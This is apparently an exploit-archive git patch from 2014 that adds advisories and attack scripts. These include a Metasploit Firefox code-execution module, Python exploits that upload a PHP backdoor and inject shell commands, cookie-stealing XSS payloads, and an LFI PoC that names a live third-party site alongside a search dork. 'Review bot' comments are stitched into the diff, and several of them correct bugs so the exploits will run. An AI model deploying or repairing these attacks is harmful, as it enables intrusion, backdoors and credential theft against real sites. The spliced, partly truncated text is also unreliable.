From c93cd0e1b80a655ff324f8df8e1884b6ac8f3a2e Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Sat, 30 Aug 2014 04:42:49 +0000 Subject: [PATCH] Updated 08_30_2014 --- files.csv | 28 ++++ platforms/jsp/webapps/34440.txt | 9 ++ platforms/linux/dos/34427.txt | 9 ++ platforms/multiple/dos/34457.txt | 9 ++ platforms/multiple/remote/34439.txt | 17 ++ platforms/multiple/remote/34448.rb | 150 +++++++++++++++++ platforms/multiple/webapps/34449.txt | 19 +++ platforms/php/webapps/34436.txt | 40 +++++ platforms/php/webapps/34438.txt | 11 ++ platforms/php/webapps/34441.txt | 28 ++++ platforms/php/webapps/34443.txt | 10 ++ platforms/php/webapps/34444.txt | 7 + platforms/php/webapps/34445.txt | 9 ++ platforms/php/webapps/34446.txt | 11 ++ platforms/php/webapps/34447.py | 82 ++++++++++ platforms/php/webapps/34450.py | 47 ++++++ platforms/php/webapps/34451.py | 53 ++++++ platforms/php/webapps/34452.py | 233 +++++++++++++++++++++++++++ platforms/php/webapps/34453.txt | 9 ++ platforms/php/webapps/34454.txt | 9 ++ platforms/php/webapps/34455.txt | 8 + platforms/php/webapps/34456.txt | 132 +++++++++++++++ platforms/php/webapps/34459.txt | 9 ++ platforms/php/webapps/34464.txt | 9 ++ platforms/windows/dos/34442.html | 21 +++ platforms/windows/dos/34458.html | 82 ++++++++++ platforms/windows/dos/34460.py | 30 ++++ platforms/windows/local/34463.py | 46 ++++++ platforms/windows/remote/34437.txt | 9 ++ 29 files changed, 1136 insertions(+) create mode 100755 platforms/jsp/webapps/34440.txt create mode 100755 platforms/linux/dos/34427.txt create mode 100755 platforms/multiple/dos/34457.txt create mode 100755 platforms/multiple/remote/34439.txt create mode 100755 platforms/multiple/remote/34448.rb create mode 100755 platforms/multiple/webapps/34449.txt create mode 100755 platforms/php/webapps/34436.txt create mode 100755 platforms/php/webapps/34438.txt create mode 100755 platforms/php/webapps/34441.txt create mode 100755 platforms/php/webapps/34443.txt create mode 100755 platforms/php/webapps/34444.txt create mode 100755 platforms/php/webapps/34445.txt 
create mode 100755 platforms/php/webapps/34446.txt create mode 100755 platforms/php/webapps/34447.py create mode 100755 platforms/php/webapps/34450.py create mode 100755 platforms/php/webapps/34451.py create mode 100755 platforms/php/webapps/34452.py create mode 100755 platforms/php/webapps/34453.txt create mode 100755 platforms/php/webapps/34454.txt create mode 100755 platforms/php/webapps/34455.txt create mode 100755 platforms/php/webapps/34456.txt create mode 100755 platforms/php/webapps/34459.txt create mode 100755 platforms/php/webapps/34464.txt create mode 100755 platforms/windows/dos/34442.html create mode 100755 platforms/windows/dos/34458.html create mode 100755 platforms/windows/dos/34460.py create mode 100755 platforms/windows/local/34463.py create mode 100755 platforms/windows/remote/34437.txt diff --git a/files.csv b/files.csv index fc6f81d60..46401420c 100755 --- a/files.csv +++ b/files.csv 
@@ -31006,9 +31006,37 @@ id,file,description,date,author,platform,type,port
 34421,platforms/linux/local/34421.c,"glibc Off-by-One NUL Byte gconv_translit_find Exploit",2014-08-27,"taviso and scarybeasts",linux,local,0
 34424,platforms/php/webapps/34424.txt,"WooCommerce Store Exporter 1.7.5 - Multiple XSS Vulnerabilities",2014-08-27,"Mike Manzotti",php,webapps,0
 34426,platforms/linux/remote/34426.txt,"uzbl \'uzbl-core\' \'@SELECTED_URI\' Mouse Button Bindings Command Injection Vulnerability",2010-08-05,Chuzz,linux,remote,0
+34427,platforms/linux/dos/34427.txt,"OpenSSL - 'ssl3_get_key_exchange()' Use-After-Free Memory Corruption Vulnerability",2010-08-07,"Georgi Guninski",linux,dos,0
 34428,platforms/windows/dos/34428.py,"Quintessential Media Player 5.0.121 '.m3u' File Buffer Overflow Vulnerability",2010-08-09,"Abhishek Lyall",windows,dos,0
 34429,platforms/asp/webapps/34429.txt,"Allinta CMS 22.07.2010 Multiple SQL Injection and Cross Site Scripting Vulnerabilities",2010-08-09,"High-Tech Bridge SA",asp,webapps,0
 34430,platforms/php/webapps/34430.txt,"Preation Eden Platform 27.7.2010 Multiple HTML Injection Vulnerabilities",2010-08-09,"High-Tech Bridge SA",php,webapps,0
 34431,platforms/linux/remote/34431.html,"Nagios XI Multiple Cross Site Request Forgery Vulnerabilities",2010-08-07,"Adam Baldwin",linux,remote,0
 34432,platforms/php/webapps/34432.txt,"Wowd 'index.html' Multiple Cross Site Scripting Vulnerabilities",2009-10-29,Lostmon,php,webapps,0
 34433,platforms/php/webapps/34433.txt,"Simple Directory Listing 2.1 'SDL2.php' Cross Site Scripting Vulnerability",2010-10-22,"Amol Naik",php,webapps,0
+34436,platforms/php/webapps/34436.txt,"WordPress ShortCode Plugin 1.1 - Local File Inclusion Vulnerability",2014-08-28,"Mehdi Karout and Christian Galeone",php,webapps,0
+34437,platforms/windows/remote/34437.txt,"Portable Document Format - Specification Signature Collision Vulnerability",2010-08-11,"Florian Zumbiehl",windows,remote,0
+34438,platforms/php/webapps/34438.txt,"MybbCentral TagCloud 2.0 'Topic' Field HTML Injection Vulnerability",2010-08-11,3ethicalhackers.com,php,webapps,0
+34439,platforms/multiple/remote/34439.txt,"ServletExec Directory Traversal Vulnerability and Multiple Authentication-Bypass Vulnerabilities",2010-08-12,"Stefano Di Paola",multiple,remote,0
+34440,platforms/jsp/webapps/34440.txt,"Computer Associates Oneview Monitor 6.0 'doSave.jsp' Remote Code Execution Vulnerability",2010-08-12,"Giorgio Fedon",jsp,webapps,0
+34441,platforms/php/webapps/34441.txt,"JForum 2.08 BBCode Color Tag HTML Injection Vulnerability",2010-05-13,"Giorgio Fedon",php,webapps,0
+34442,platforms/windows/dos/34442.html,"Kylinsoft InstantGet 2.08 ActiveX Control 'ShowBar' Method Buffer Overflow Vulnerability",2009-09-19,the_Edit0r,windows,dos,0
+34443,platforms/php/webapps/34443.txt,"PaoLink 1.0 'scrivi.php' Cross Site Scripting Vulnerability",2009-09-16,Moudi,php,webapps,0
+34444,platforms/php/webapps/34444.txt,"RSSMediaScript 'index.php' Cross Site Scripting Vulnerability",2009-09-16,Moudi,php,webapps,0
+34445,platforms/php/webapps/34445.txt,"LiveStreet 0.2 Comment Topic Header XSS",2009-08-31,Inj3ct0r,php,webapps,0
+34446,platforms/php/webapps/34446.txt,"LiveStreet 0.2 include/ajax/blogInfo.php asd Parameter XSS",2009-08-31,Inj3ct0r,php,webapps,0
+34447,platforms/php/webapps/34447.py,"Plogger 1.0-RC1 - Authenticated Arbitrary File Upload",2014-08-28,b0z,php,webapps,80
+34448,platforms/multiple/remote/34448.rb,"Firefox WebIDL Privileged Javascript Injection",2014-08-28,metasploit,multiple,remote,0
+34449,platforms/multiple/webapps/34449.txt,"ManageEngine DeviceExpert 5.9 - User Credential Disclosure",2014-08-28,"Pedro Ribeiro",multiple,webapps,0
+34450,platforms/php/webapps/34450.py,"ActualAnalyzer Lite 2.81 - Unauthenticated Command Execution",2014-08-28,"Benjamin Harris",php,webapps,80
+34451,platforms/php/webapps/34451.py,"PhpWiki - Remote Command Execution",2014-08-28,"Benjamin 
Harris",php,webapps,80
+34452,platforms/php/webapps/34452.py,"XRMS - Blind SQL Injection and Command Execution",2014-08-28,"Benjamin Harris",php,webapps,80
+34453,platforms/php/webapps/34453.txt,"PaoBacheca 2.1 index.php URI XSS",2009-09-16,Moudi,php,webapps,0
+34454,platforms/php/webapps/34454.txt,"PaoBacheca 2.1 scrivi.php URI XSS",2009-09-16,Moudi,php,webapps,0
+34455,platforms/php/webapps/34455.txt,"Rock Band CMS 0.10 'news.php' Multiple SQL Injection Vulnerabilities",2010-08-12,Affix,php,webapps,0
+34456,platforms/php/webapps/34456.txt,"JBoard Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2009-08-31,Inj3ct0r,php,webapps,0
+34457,platforms/multiple/dos/34457.txt,"Sniper Elite 1.0 - NULL Pointer Dereference Denial Of Service Vulnerability",2009-08-14,"Luigi Auriemma",multiple,dos,0
+34458,platforms/windows/dos/34458.html,"Internet Explorer MS14-029 Memory Corruption PoC",2014-08-28,PhysicalDrive0,windows,dos,0
+34459,platforms/php/webapps/34459.txt,"Amiro.CMS 5.4 Multiple Input Validation Vulnerabilities",2009-10-19,"Vladimir Vorontsov",php,webapps,0
+34460,platforms/windows/dos/34460.py,"Sonique 2.0 '.xpl' File Remote Stack-Based Buffer Overflow Vulnerability",2010-08-12,"Hamza_hack_dz & Black-liondz1",windows,dos,0
+34463,platforms/windows/local/34463.py,"HTML Help Workshop 1.4 - (SEH) Buffer Overflow",2014-08-29,"Moroccan Kingdom (MKD)",windows,local,0
+34464,platforms/php/webapps/34464.txt,"SyntaxCMS 'rows_per_page' Parameter SQL Injection Vulnerability",2010-08-10,"High-Tech Bridge SA",php,webapps,0
diff --git a/platforms/jsp/webapps/34440.txt b/platforms/jsp/webapps/34440.txt
new file mode 100755
index 000000000..f835210a6
--- /dev/null
+++ b/platforms/jsp/webapps/34440.txt
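Review bot: The index description for 34436 (`"WordPress ShortCode Plugin 1.1 - Local File Inclusion Vulnerability"`) does not use the plugin's actual name; the advisory it points at names the plugin `Download ShortCode`, with the download slug `download-shortcode` and the vulnerable file `force-download.php`. Anyone searching the index for the real plugin will miss this entry, so I would change the description to `"WordPress Download ShortCode Plugin 1.1 - Local File Inclusion Vulnerability"`, matching the advisory header.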
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/42413/info
+
+Computer Associates Oneview Monitor is prone to a remote code-execution vulnerability because the application fails to sufficiently sanitize user-supplied input.
+
+Exploiting this issue will allow an attacker to inject and execute arbitrary JSP code in the context of the affected webserver.
+
+The following example URI is available:
+
+ttp://www.example.com/sitemindermonitor/doSave.jsp?file=../attacksample.jsp
\ No newline at end of file
diff --git a/platforms/linux/dos/34427.txt b/platforms/linux/dos/34427.txt
new file mode 100755
index 000000000..ef9a31494
--- /dev/null
+++ b/platforms/linux/dos/34427.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/42306/info
+
+OpenSSL is prone to a remote memory-corruption vulnerability.
+
+Successfully exploiting this issue may allow an attacker to execute arbitrary code in the context of the application using the vulnerable library. Failed exploit attempts will result in a denial-of-service condition.
+
+The issue affects OpenSSL 1.0.0a; other versions may also be affected.
+
+http://www.exploit-db.com/sploits/34427.zip
\ No newline at end of file
diff --git a/platforms/multiple/dos/34457.txt b/platforms/multiple/dos/34457.txt
new file mode 100755
index 000000000..2cbcdcd02
--- /dev/null
+++ b/platforms/multiple/dos/34457.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/42428/info
+
+Sniper Elite is prone to a denial-of-service vulnerability because of a NULL-pointer dereference error.
+
+Successful exploits may allow remote attackers to cause denial-of-service conditions. Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed.
+
+Versions prior to Sniper Elite 1.0 are vulnerable.
+
+http://www.exploit-db.com/sploits/34457.zip
\ No newline at end of file
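Review bot: The example URI on the last line of 34440.txt has lost the first character of its scheme (`ttp://www.example.com/...`), so it cannot be pasted as-is; it should read `http://www.example.com/sitemindermonitor/doSave.jsp?file=../attacksample.jsp`. The advisory also never says where the JSP body comes from or what `doSave.jsp` does with `file=` — presumably another parameter carries the content and the traversal places it where the container will compile it, but that is inferred, and without it the BID link is the only way to reproduce. One sentence naming the content parameter and the resulting on-disk path would make this entry self-contained.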
diff --git a/platforms/multiple/remote/34439.txt b/platforms/multiple/remote/34439.txt
new file mode 100755
index 000000000..fbdd4845f
--- /dev/null
+++ b/platforms/multiple/remote/34439.txt
@@ -0,0 +1,17 @@
+source: http://www.securityfocus.com/bid/42411/info
+
+ServletExec is prone to a directory-traversal vulnerability and multiple authentication-bypass vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
+
+Exploiting these issues may allow an attacker to gain administrative access to the affected application and to obtain sensitive information that could aid in further attacks.
+
+Versions prior to ServletExec 6.0.0.2_39 are vulnerable.
+
+http://www.example.com/servlet/pagecompile._admin._help._helpContent_xjsp?page=../../WEB-INF/web.xml
+http://www.example.com/servlet/pagecompile._admin._login_xjsp
+http://www.example.com/servlet/pagecompile._admin._vmSystemProperties_xjsp
+http://www.example.com/servlet/pagecompile._admin._SELogging_xjsp
+http://www.example.com/servlet/pagecompile._admin._userMgt_xjsp
+http://www.example.com/servlet/pagecompile._admin._virtualServers_xjsp
+http://www.example.com/servlet/pagecompile._admin._optionalPackages_xjsp
+http://www.example.com/servlet/pagecompile._admin._dataSources_xjsp
+http://www.example.com/servlet/pagecompile._admin._debug_xjsp
\ No newline at end of file
diff --git a/platforms/multiple/remote/34448.rb b/platforms/multiple/remote/34448.rb
new file mode 100755
index 000000000..2f1939d79
--- /dev/null
+++ b/platforms/multiple/remote/34448.rb
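Review bot: The nine URIs at the end of 34439.txt are listed without saying which flaw each demonstrates; only the first carries a parameter, and its `page=../../WEB-INF/web.xml` is the directory-traversal read, while the other eight request precompiled admin pages (`pagecompile._admin.*_xjsp`) directly, which is presumably the authentication bypass. I would add a heading above each group, e.g. `Directory traversal (reads WEB-INF/web.xml):` before the first URI and `Authentication bypass (admin pages reachable without login):` before the rest. The advisory also does not say whether the traversal is limited to the web application root or reaches the filesystem; the single example is under the webapp, so that boundary should be stated rather than assumed.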
@@ -0,0 +1,150 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'rex/exploitation/jsobfu' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::BrowserExploitServer + include Msf::Exploit::Remote::BrowserAutopwn + include Msf::Exploit::Remote::FirefoxPrivilegeEscalation + + autopwn_info({ + :ua_name => HttpClients::FF, + :ua_maxver => "22.0", + :ua_maxver => "27.0", + :javascript => true, + :rank => ExcellentRanking + }) + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Firefox WebIDL Privileged Javascript Injection', + 'Description' => %q{ + This exploit gains remote code execution on Firefox 22-27 by abusing two + separate privilege escalation vulnerabilities in Firefox's Javascript + APIs. + }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'Marius Mlynski', # discovery and pwn2own exploit + 'joev' # metasploit module + ], + 'DisclosureDate' => "Mar 17 2014", + 'References' => [ + ['CVE', '2014-1510'], # open chrome:// url in iframe + ['CVE', '2014-1511'] # bypass popup blocker to load bare ChromeWindow + ], + 'Targets' => [ + [ + 'Universal (Javascript XPCOM Shell)', { + 'Platform' => 'firefox', + 'Arch' => ARCH_FIREFOX + } + ], + [ + 'Native Payload', { + 'Platform' => %w{ java linux osx solaris win }, + 'Arch' => ARCH_ALL + } + ] + ], + 'DefaultTarget' => 0, + 'BrowserRequirements' => { + :source => 'script', + :ua_name => HttpClients::FF, + :ua_ver => lambda { |ver| ver.to_i.between?(22, 27) } + } + )) + + register_options([ + OptString.new('CONTENT', [ false, "Content to display inside the HTML .", "" ]) + ], self.class) + end + + def on_request_exploit(cli, request, target_info) + send_response_html(cli, generate_html(target_info)) + end + + def generate_html(target_info) + key = Rex::Text.rand_text_alpha(5 + rand(12)) + frame = Rex::Text.rand_text_alpha(5 + 
rand(12)) + r = Rex::Text.rand_text_alpha(5 + rand(12)) + opts = { key => run_payload } # defined in FirefoxPrivilegeEscalation mixin + data_uri = "data:text/html, + #{datastore['CONTENT']} + + + | + end +end diff --git a/platforms/multiple/webapps/34449.txt b/platforms/multiple/webapps/34449.txt new file mode 100755 index 000000000..0418b94de --- /dev/null +++ b/platforms/multiple/webapps/34449.txt @@ -0,0 +1,19 @@ +>> User credential disclosure in ManageEngine DeviceExpert 5.9 +>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security +========================================================================== + +>> Background on the affected product: +"DeviceExpert is a web–based, multi vendor network change, configuration and compliance management (NCCCM) solution for switches, routers, firewalls and other network devices. Trusted by thousands of network administrators around the world, DeviceExpert helps automate and take total control of the entire life cycle of device configuration management." + + +>> Technical details: +Vulnerability: User credential disclosure / CVE-2014-5377 +Constraints: no authentication or any other information needed. +Affected versions: UNFIXED as of 27/08/2014 - current version 5.9 build 5980 is vulnerable, older versions likely vulnerable + +GET /ReadUsersFromMasterServlet + +Example response: +adminAdministratorOk6/FqR5WtJY5UCLrnvjQQ==noreply@zohocorp.com12345678 + +The passwords are a salted MD5 hash. diff --git a/platforms/php/webapps/34436.txt b/platforms/php/webapps/34436.txt new file mode 100755 index 000000000..4d2b005a7 --- /dev/null +++ b/platforms/php/webapps/34436.txt 
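Review bot: The `autopwn_info` hash at the top of 34448.rb lists `:ua_maxver` twice (`"22.0"` then `"27.0"`); in a Ruby hash literal the later key wins, so BrowserAutopwn is never told the minimum version even though `BrowserRequirements` restricts the target to Firefox 22–27. The first entry should be `:ua_minver => "22.0",`. The listing is also visibly truncated after `data_uri = "data:text/html,` — the injected HTML/JS, the `opts` usage and the remainder of `generate_html` are missing here, presumably stripped as markup — so nothing beyond the module metadata can be reviewed, and `generate_html` effectively ends outside what is visible.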
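Review bot: The `Example response` line in 34449.txt has lost its structure (`adminAdministratorOk6/FqR5WtJY5UCLrnvjQQ==noreply@zohocorp.com12345678` runs the fields together), presumably because the servlet's XML element names were stripped; the advisory should show those names so a reader can tell which field is the hash and which, if any, is the salt. `Ok6/FqR5WtJY5UCLrnvjQQ==` base64-decodes to 16 bytes, consistent with the stated salted MD5, but the text never says where the salt lives — if `/ReadUsersFromMasterServlet` also returns it, an unauthenticated caller has everything needed for offline cracking, which is worth stating plainly. Since the advisory says the issue is unfixed, a one-line mitigation (deny that servlet path at the reverse proxy or firewall) would also be useful.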
@@ -0,0 +1,40 @@
+#################################################################################################
+#
+# Title : WordPress ShortCode Plugin - Local File Inclusion Vulnerability
+# Severity : High+/Critical
+# Reporter(s) : Mehdi Karout & Christian Galeone
+# Google Dork : inurl:wp/wp-content/force-download.php
+# Plugin Version : 1.1
+# Plugin Name : Download ShortCode
+# Plugin Download Link : http://downloads.wordpress.org/plugin/download-shortcode.1.1.zip
+# Vendor Home : http://werdswords.com/
+# Date : 25/08/2014
+# Tested in : Win7 - Kali Linux
+# CVE : CVE-2014-5465
+#
+##################################################################################################
+#
+# PoC :
+#
+#
+# http://localhost:80/wordpress/wp/wp-content/force-download.php?file=[File]
+#
+# http://localhost:80/wordpress/wp/wp-content/force-download.php?file=../wp-config.php
+#
+# Exploit Code :
+#
+# $file = $_GET['file'];
+# if(isset($file))
+# {
+# include("pages/$file");
+# }
+# else
+# {
+# include("index.php");
+# }
+#
+# Demo :
+#
+# http://llyndamoreboots.com/wp/wp-content/force-download.php?file=../wp-config.php
+#
+##################################################################################################
\ No newline at end of file
diff --git a/platforms/php/webapps/34438.txt b/platforms/php/webapps/34438.txt
new file mode 100755
index 000000000..106c3dbd1
--- /dev/null
+++ b/platforms/php/webapps/34438.txt
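Review bot: The PoC `force-download.php?file=../wp-config.php` in 34436.txt is executed, not displayed, by the quoted `include("pages/$file")`, so on its own it produces no visible output (wp-config.php only defines constants); the advisory should say what observable effect proves the bug, or show a request that does. Because the include path is prefixed with `pages/`, `php://filter` wrappers cannot be used to read the file back, so actual disclosure or code execution would need a null byte on old PHP or an attacker-writable file the include can reach — that constraint belongs in the write-up. The `Demo` line targets a live third-party site (`llyndamoreboots.com`) and, combined with the `Google Dork`, invites mass exploitation; it should be replaced with `http://www.example.com/wp/wp-content/force-download.php?file=../wp-config.php` like the other entries in this commit.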
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/42406/info
+
+TagCloud is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+TagCloud version 2.0 is vulnerable; other versions may also be affected.
+
+The following example input is available:
+
+'Topic' Field: 
\ No newline at end of file
diff --git a/platforms/php/webapps/34441.txt b/platforms/php/webapps/34441.txt
new file mode 100755
index 000000000..071fa422a
--- /dev/null
+++ b/platforms/php/webapps/34441.txt
@@ -0,0 +1,28 @@
+source: http://www.securityfocus.com/bid/42414/info
+
+JForum is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+JForum 2.08 is vulnerable; other versions may also be affected.
+
+Stored XSS - proof of concept for Firefox ("onMouseOver" is blacklisted):
+
+ [color=red' style='top:0px;left:0px;position:absolute;font-size:500;opacity:0' /onMouseOver='alert(document.cookie)']XSS4FF[/color]
+
+
+Renders into the following HTML code:
+
+ XSS4FF
+
+
+
+Stored XSS - proof of concept for Internet Explorer ("style" cannot contain parenthesis "(" ):
+
+ [color=red' /style='color:expression(alert(document.cookie))']XSS4IE[/color]
+
+
+
+Renders into the following HTML code:
+
+ XSS4IE
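Review bot: Both `Renders into the following HTML code:` sections in 34441.txt contain only the bare text `XSS4FF` / `XSS4IE`; the rendered tag that shows how the single quote closes the `color` attribute and turns the rest of the BBCode argument into new attributes is exactly what a reader needs, and it appears to have been stripped as markup in this listing. If the original markup cannot be recovered, a sentence stating that outcome (the quote terminates the attribute and `onMouseOver=` / `style=` become attributes of the generated tag) is the minimum. The IE payload also depends on `expression()` inside `style`, which later IE versions no longer evaluate, so the write-up should state which IE versions it was confirmed on.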
diff --git a/platforms/php/webapps/34443.txt b/platforms/php/webapps/34443.txt
new file mode 100755
index 000000000..f6130b99e
--- /dev/null
+++ b/platforms/php/webapps/34443.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/42420/info
+
+PaoLink is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+PaoLink 1.0 is vulnerable; other versions may also be affected.
+
+ http://www.example.com/paolink/demo/scrivi.php/">
+
diff --git a/platforms/php/webapps/34444.txt b/platforms/php/webapps/34444.txt
new file mode 100755
index 000000000..0c51cd993
--- /dev/null
+++ b/platforms/php/webapps/34444.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/42421/info
+
+RSSMediaScript is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+http://www.example.com/demo/index.php?cat=5&page=1">
\ No newline at end of file
diff --git a/platforms/php/webapps/34445.txt b/platforms/php/webapps/34445.txt
new file mode 100755
index 000000000..adb59cd52
--- /dev/null
+++ b/platforms/php/webapps/34445.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/42422/info
+
+LiveStreet is prone to an HTML-injection vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage the issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, or launch other attacks.
+
+LiveStreet 0.2 is vulnerable; other versions may also be affected.
+
+ 
\ No newline at end of file
diff --git a/platforms/php/webapps/34446.txt b/platforms/php/webapps/34446.txt
new file mode 100755
index 000000000..b9afa99ba
--- /dev/null
+++ b/platforms/php/webapps/34446.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/42422/info
+
+LiveStreet is prone to an HTML-injection vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage the issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, or launch other attacks.
+
+LiveStreet 0.2 is vulnerable; other versions may also be affected.
+
+Cross Site Scripting:
+
+/include/ajax/blogInfo.php?asd=
\ No newline at end of file
diff --git a/platforms/php/webapps/34447.py b/platforms/php/webapps/34447.py
new file mode 100755
index 000000000..93fcc6f53
--- /dev/null
+++ b/platforms/php/webapps/34447.py
@@ -0,0 +1,82 @@ +#!/usr/bin/env python + + +# Exploit Title: Plogger Authenticated Arbitrary File Upload +# Date: Feb 2014 +# Exploit Author: b0z +# Vendor Homepage: www.plogger.org +# Software Link: www.plogger.org/download +# Version: Plogger prior to 1.0-RC1 +# CVE : 2014-2223 + +import hashlib +import os +import zipfile + +import requests +import time +import argparse + + + +def login(session,host,username,password): + print "[+] Log in" + + session.post('http://%s/plog-admin/plog-upload.php' % host, data={ + "plog_username": username, + "plog_password": password, + "action": "log_in" + }) + +def upload(session): + print "[+] Creating poisoned gift" + ## Write the backdoor + backdoor = open(magic + '.php', 'w+', buffering = 0) + backdoor.write("") + backdoor.close + + # Add true image file to block the race condition (mandatory not null) + image = open(magic + '.png', 'w+', buffering = 0) + image.write('A') + image.close + + gift = zipfile.ZipFile(magic + '.zip', mode = 'w') + gift.write(magic + '.php') + gift.write(magic + '.png') + gift.close + + os.remove(magic + '.php') + os.remove(magic + '.png') + + gift = open(magic + '.zip', 'rb') + files= { "userfile": ("archive.zip", gift)} + session.post('http://%s/plog-admin/plog-upload.php' % host, files=files, + data = { + "destination_radio":"existing", + "albums_menu" : "1", + "new_album_name":"", + "collections_menu":"1", + "upload":"Upload" + }) + + os.remove(magic + '.zip') + print '[+] Here we go ==> http://%s/plog-content/uploads/archive/%s.php' % (host,magic) + +if __name__== "__main__": + + parser = argparse.ArgumentParser() + parser.add_argument("--host" , help="Remote host",required=True) + parser.add_argument("--user" , help="Username",required=True) + parser.add_argument("--password" , help="Password",required=True) + args = parser.parse_args() + + host = args.host + username = args.user + password = args.user + + magic = hashlib.sha1(time.asctime()).hexdigest() + + session = requests.session() + 
login(session,host,username,password) + upload(session) + diff --git a/platforms/php/webapps/34450.py b/platforms/php/webapps/34450.py new file mode 100755 index 000000000..d25944f4f --- /dev/null +++ b/platforms/php/webapps/34450.py @@ -0,0 +1,47 @@ +############################### +# ActualAnalyzer exploit. +# Tested on Lite version +# We load command into a dummy variable as we only have 6 characters to own the eval +# but load more as first 2 characters get rm'd. +# We then execute the eval with backticks. +# 11/05/2011 +############################## + +import urllib +import urllib2 +import sys +import time + + + +def banner(): + print " ____ __ __ __ " + print " / __/_ ______ _ ____ ______/ /___ ______ _/ /___ _____ ____ _/ /_ ______ ___ _____" + print " / /_/ / / / __ `// __ `/ ___/ __/ / / / __ `/ / __ `/ __ \/ __ `/ / / / /_ / / _ \/ ___/" + print " / __/ /_/ / /_/ // /_/ / /__/ /_/ /_/ / /_/ / / /_/ / / / / /_/ / / /_/ / / /_/ __/ / " + print " /_/ \__,_/\__, (_)__,_/\___/\__/\__,_/\__,_/_/\__,_/_/ /_/\__,_/_/\__, / /___/\___/_/ " + print " /_/ /____/ " + + +def usage(): + print " [+] Usage:" + print " [-] python " + sys.argv[0] + " -h vulnHOST -d analyticdomain -c \"command\"" + print " [-] python fuq.actualanalyzer.py -h test.com/lite -d analyticdomain -c \"touch /tmp/123\"" + +banner() +if len(sys.argv) < 6: + usage() + quit() +domain = sys.argv[2] +command = sys.argv[6] +host = syst.argv[4] + +def commandexploit(domain,host,command): + url = 'http://' + domain + '/aa.php?anp=' + host + data = None + headers = {'Cookie': "ant=" + command + "; anm=414.`$cot`"} + exploit1 = urllib2.Request(url,data,headers) + exploit2 = urllib2.urlopen(exploit1) + +commandexploit(domain,host,command) + diff --git a/platforms/php/webapps/34451.py b/platforms/php/webapps/34451.py new file mode 100755 index 000000000..f921167aa --- /dev/null +++ b/platforms/php/webapps/34451.py 
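Review bot: In the `__main__` block of 34447.py, `password = args.user` assigns the username to the password variable, so `login()` always posts the username as `plog_password` and the subsequent upload fails silently; it should be `password = args.password`. `backdoor.close`, `image.close` and `gift.close` are never called (missing parentheses) — the zip's central directory is only written because rebinding `gift` at `gift = open(magic + '.zip', 'rb')` lets CPython's refcounting run `ZipFile.__del__`, which is fragile; wrap each in `with zipfile.ZipFile(...) as gift:` / `with open(...) as f:` instead. `backdoor.write("")` writes an empty file in this listing, presumably because the PHP payload was stripped as markup, and `upload()` relies on `magic` and `host` as module globals rather than taking them as parameters like `login()` does.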
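Review bot: `host = syst.argv[4]` in 34450.py is a typo for `sys.argv[4]` and raises `NameError` before any request is built, so the script as committed cannot run; fix to `host = sys.argv[4]`. The argument handling also indexes `sys.argv` by position while the usage text advertises `-h`/`-d`/`-c` flags, so the flags are ignored and the three values must be given in exactly that order; `argparse` would make the interface match the help. `exploit2` and the `time` import are unused and the response body is never read, so a rejected injection is indistinguishable from a successful one.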
